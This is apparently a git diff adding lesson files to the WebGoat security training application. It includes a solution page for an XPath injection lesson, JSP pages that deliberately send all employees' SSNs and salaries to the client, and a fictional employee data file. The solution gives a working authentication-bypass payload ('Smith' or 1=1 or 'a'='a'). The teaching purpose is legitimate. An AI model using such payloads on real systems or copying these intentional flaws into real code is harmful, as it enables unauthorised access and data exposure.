+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+h3
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 3 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:3;
+	font-size:13.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.Heading3Char
+	{mso-style-name:"Heading 3 Char";
+	mso-style-noshow:yes;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 3";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Times New Roman","serif";
+	mso-ascii-font-family:"Times New Roman";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Times New Roman";
+	mso-bidi-font-family:Arial;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform XPATH Injection Attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+teaches how to perform XPath Injection attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Similar to SQL
+Injection, XPATH Injection attacks occur when a web site uses user supplied
+information to query XML data. By sending intentionally malformed information
+into the web site, an attacker can find out how the XML data is structured or
+access data that they may not normally have access to. They may even be able to
+elevate their privileges on the web site if the xml data is being used for
+authentication (such as an xml based user file). Querying XML is done with
+XPath, a type of simple descriptive statement that allows the xml query to
+locate a piece of information. Like SQL you can specify certain attributes to
+find and patterns to match. When using XML for a web site it is common to
+accept some form of input on the query string to identify the content to locate
+and display on the page. This input must be sanitized to verify that it doesn't
+mess up the XPath query and return the wrong data. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->The
+form below allows employees to see all their personal data including their
+salaries. Your account is Mike/test123. Your goal is to try to see other
+employees data as well.</span><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_141" o:spid="_x0000_i1027" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XPATHInjection_files/image007.jpg" v:shapes="Picture_x0020_141"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> XPath Injection</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>XPath injection is similar to SQL Injection. Input is not validated and
+used to create a XPath query. Injecting Smith' or 1=1 or 'a'='a will log you on
+as the first user defined in the system. Password is a required field, so there
+you can enter whatever you want.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_142"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XPATHInjection_files/image008.jpg" v:shapes="Picture_x0020_142"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Inject XPath payload</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_143" o:spid="_x0000_i1025"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XPATHInjection_files/image009.jpg" v:shapes="Picture_x0020_143"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/XPATHInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/XPATHInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/XPATHInjection_files/filelist.xml
new file mode 100644
index 000000000..3d5d19db6
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/XPATHInjection_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../XPATHInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image007.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/image001.png b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image001.png
new file mode 100644
index 000000000..c710b2228
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/image003.png b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image003.png
new file mode 100644
index 000000000..aa3b3886c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/image005.png b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image005.png
new file mode 100644
index 000000000..c63e9830a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/image007.jpg b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image007.jpg
new file mode 100644
index 000000000..a74456833
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image007.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/image008.jpg b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image008.jpg
new file mode 100644
index 000000000..229e969db
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/image009.jpg b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image009.jpg
new file mode 100644
index 000000000..731010dab
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XPATHInjection_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/XPATHInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XPATHInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lessons/Ajax/clientSideFiltering.jsp b/main/project/WebContent/lessons/Ajax/clientSideFiltering.jsp
new file mode 100644
index 000000000..f8181cb0b
--- /dev/null
+++ b/main/project/WebContent/lessons/Ajax/clientSideFiltering.jsp
@@ -0,0 +1,114 @@
+
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+    pageEncoding="ISO-8859-1"%>
+    
+<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>  
+    
+<% 
+
+	String userId = request.getParameter("userID");
+
+
+	NodeList nodes = null;
+	
+	
+
+	File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
+	
+	if(d.exists()){
+		System.out.print("File does exist");
+	}
+	else{
+		System.out.print("File DOES NOT exist");
+	}
+	
+	System.out.println(d.getAbsolutePath());
+	XPathFactory factory = XPathFactory.newInstance();
+	XPath xPath = factory.newXPath();
+	InputSource inputSource = new InputSource(new FileInputStream(d));
+
+
+
+
+
+	
+	StringBuffer sb = new StringBuffer();
+	
+	sb.append("/Employees/Employee/UserID | ");
+	sb.append("/Employees/Employee/FirstName | ");
+	sb.append("/Employees/Employee/LastName | ");
+	sb.append("/Employees/Employee/SSN | ");
+	sb.append("/Employees/Employee/Salary ");
+	
+	String expression = sb.toString();
+	
+	
+	System.out.print("expression:" + expression);
+
+
+
+	nodes = (NodeList) xPath.evaluate(expression, inputSource,
+	XPathConstants.NODESET);
+	int nodesLength = nodes.getLength();
+
+	
+	System.out.println("nodesLength:" + nodesLength);
+
+	TR tr;
+	
+	int COLUMNS = 5;
+	
+	Table t2 = null;
+    if (nodesLength > 0)
+    {
+		t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
+			1).setWidth("90%").setAlign("center");
+		tr = new TR();	
+		tr.addElement(new TD().addElement("UserID"));
+		tr.addElement(new TD().addElement("First Name"));
+		tr.addElement(new TD().addElement("Last Name"));
+		tr.addElement(new TD().addElement("SSN"));
+		tr.addElement(new TD().addElement("Salary"));
+		t2.addElement(tr);
+    }
+    
+
+    
+    tr = new TR();
+    
+    for (int i = 0; i < nodesLength; i++)
+    {
+		Node node = nodes.item(i);
+		
+		if(i%COLUMNS==0){
+			tr = new TR();
+			tr.setID(node.getTextContent());
+			//tr.setStyle("display: none");
+		}
+		
+		tr.addElement(new TD().addElement(node.getTextContent()));
+		
+		if(i%COLUMNS==(COLUMNS-1)){
+			t2.addElement(tr);		
+		}
+    }
+    
+    if(t2 != null){
+   	 	out.println(t2.toString());
+    }
+    else{
+    	out.println("No Results");
+    }
+    
+    
+
+    
+	
+	
+	
+	
+	
+
+
+%>
+    
diff --git a/main/project/WebContent/lessons/Ajax/clientSideFiltering_backup.jsp b/main/project/WebContent/lessons/Ajax/clientSideFiltering_backup.jsp
new file mode 100644
index 000000000..f8181cb0b
--- /dev/null
+++ b/main/project/WebContent/lessons/Ajax/clientSideFiltering_backup.jsp
@@ -0,0 +1,114 @@
+
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+    pageEncoding="ISO-8859-1"%>
+    
+<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>  
+    
+<% 
+
+	String userId = request.getParameter("userID");
+
+
+	NodeList nodes = null;
+	
+	
+
+	File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
+	
+	if(d.exists()){
+		System.out.print("File does exist");
+	}
+	else{
+		System.out.print("File DOES NOT exist");
+	}
+	
+	System.out.println(d.getAbsolutePath());
+	XPathFactory factory = XPathFactory.newInstance();
+	XPath xPath = factory.newXPath();
+	InputSource inputSource = new InputSource(new FileInputStream(d));
+
+
+
+
+
+	
+	StringBuffer sb = new StringBuffer();
+	
+	sb.append("/Employees/Employee/UserID | ");
+	sb.append("/Employees/Employee/FirstName | ");
+	sb.append("/Employees/Employee/LastName | ");
+	sb.append("/Employees/Employee/SSN | ");
+	sb.append("/Employees/Employee/Salary ");
+	
+	String expression = sb.toString();
+	
+	
+	System.out.print("expression:" + expression);
+
+
+
+	nodes = (NodeList) xPath.evaluate(expression, inputSource,
+	XPathConstants.NODESET);
+	int nodesLength = nodes.getLength();
+
+	
+	System.out.println("nodesLength:" + nodesLength);
+
+	TR tr;
+	
+	int COLUMNS = 5;
+	
+	Table t2 = null;
+    if (nodesLength > 0)
+    {
+		t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
+			1).setWidth("90%").setAlign("center");
+		tr = new TR();	
+		tr.addElement(new TD().addElement("UserID"));
+		tr.addElement(new TD().addElement("First Name"));
+		tr.addElement(new TD().addElement("Last Name"));
+		tr.addElement(new TD().addElement("SSN"));
+		tr.addElement(new TD().addElement("Salary"));
+		t2.addElement(tr);
+    }
+    
+
+    
+    tr = new TR();
+    
+    for (int i = 0; i < nodesLength; i++)
+    {
+		Node node = nodes.item(i);
+		
+		if(i%COLUMNS==0){
+			tr = new TR();
+			tr.setID(node.getTextContent());
+			//tr.setStyle("display: none");
+		}
+		
+		tr.addElement(new TD().addElement(node.getTextContent()));
+		
+		if(i%COLUMNS==(COLUMNS-1)){
+			t2.addElement(tr);		
+		}
+    }
+    
+    if(t2 != null){
+   	 	out.println(t2.toString());
+    }
+    else{
+    	out.println("No Results");
+    }
+    
+    
+
+    
+	
+	
+	
+	
+	
+
+
+%>
+    
diff --git a/main/project/WebContent/lessons/Ajax/clientSideValidation.jsp b/main/project/WebContent/lessons/Ajax/clientSideValidation.jsp
new file mode 100644
index 000000000..a035833c3
--- /dev/null
+++ b/main/project/WebContent/lessons/Ajax/clientSideValidation.jsp
@@ -0,0 +1,30 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+    pageEncoding="ISO-8859-1"%>
+    
+    
+    
+<% String coupon = request.getParameter("coupon");
+
+if (coupon.equalsIgnoreCase("PLATINUM")){
+	out.print(".25");
+}
+else if (coupon.equalsIgnoreCase("GOLD")){
+	out.print(".5");
+}
+else if (coupon.equalsIgnoreCase("SILVER")){
+	out.print(".75");
+}
+else if (coupon.equalsIgnoreCase("BRONZE")){
+	out.print(".8");
+}
+else if (coupon.equalsIgnoreCase("PRESSONE")){
+	out.print(".9");
+}
+else if (coupon.equalsIgnoreCase("PRESSTWO")){
+	out.print(".95");
+}
+
+
+
+%>    
+    
diff --git a/main/project/WebContent/lessons/Ajax/employees.xml b/main/project/WebContent/lessons/Ajax/employees.xml
new file mode 100644
index 000000000..c15e654b4
--- /dev/null
+++ b/main/project/WebContent/lessons/Ajax/employees.xml
@@ -0,0 +1,251 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Employees>
+    <Employee >
+        <UserID>101</UserID>
+        <FirstName>Larry</FirstName>
+        <LastName>Stooge</LastName>
+        <Street>9175 Guilford Rd</Street>
+        <CS>New York, NY</CS>
+        <Phone>443-689-0192</Phone>
+        <StartDate>1012000</StartDate>
+        <SSN>386-09-5451</SSN>
+        <Salary>55000</Salary>
+        <CreditCard>2578546969853547</CreditCard>
+        <Limit>5000</Limit>
+        <Comments>Does not work well with others</Comments>
+        <DisciplinaryExplanation>Constantly harassing coworkers</DisciplinaryExplanation>
+        <DisciplinaryDate>10106</DisciplinaryDate>
+        <Managers>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers> 
+    </Employee>
+    <Employee>
+        <UserID>102</UserID>
+        <FirstName>Moe</FirstName>
+        <LastName>Stooge</LastName>
+        <Street>3013 AMD Ave</Street>
+        <CS>New York, NY</CS>
+        <Phone>443-938-5301</Phone>
+        <StartDate>3082003</StartDate>
+        <SSN>936-18-4524</SSN>
+        <Salary>140000</Salary>
+        <CreditCard>NA</CreditCard>
+        <Limit>0</Limit>
+        <Comments>Very dominating over Larry and Curly</Comments>
+        <DisciplinaryExplanation>Hit Curly over head</DisciplinaryExplanation>
+        <DisciplinaryDate>101013</DisciplinaryDate>
+        <Managers>
